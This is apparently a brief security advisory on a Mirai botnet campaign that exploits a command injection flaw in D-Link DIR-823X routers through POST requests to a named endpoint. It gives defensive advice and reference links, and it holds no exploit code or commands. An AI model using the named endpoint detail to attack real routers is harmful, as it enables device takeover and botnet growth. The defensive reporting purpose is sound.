D-Link Devices Exploited by Mirai Malware

EXECUTIVE SUMMARY

Threat actors have been actively exploiting a command injection vulnerability in D-Link DIR-823X series routers, using it to deploy Mirai botnet variants. This campaign targets retired devices that have not been properly patched or secured, allowing the attackers to leverage a known flaw in the firmware. The goal of this campaign appears to be data theft and disruption, with the attackers using the Mirai malware to gain control over compromised devices.[emaillocker id="1283"]

The malware infects systems through a POST request to the /goform/set_prohibiting endpoint, which allows an authorized attacker to execute arbitrary commands on remote devices. Once inside, the malware uses encryption, persistence, and lateral movement to spread and maintain control over the compromised system. The attackers then use the compromised device to fetch and load a Mirai malware payload, which supports various architectures and has a hard-coded console execution string.

This campaign is significant because it highlights the continued threat posed by Mirai malware and the importance of proper patching and securing of retired devices. Organisations should be aware of this threat and take defensive actions to prevent it. This includes regularly monitoring vulnerability disclosures relevant to their infrastructure, applying proper patches, upgrades, and safeguards to ensure operational security. organisations should also implement robust endpoint protection, monitoring, and backups to detect and respond to potential threats. Additionally, organisations should ensure that their devices are properly configured and that they are not using vulnerable devices that have been retired.

THREAT PROFILE:

REFERENCES:

reports contain further technical details:
https://www.helpnetsecurity.com/2026/04/22/new-mirai-variants-target-routers-and-dvrs-via-old-flaws/
https://www.akamai.com/blog/security-research/2026/apr/cve-2025-29635-mirai-campaign-targets-d-link-devices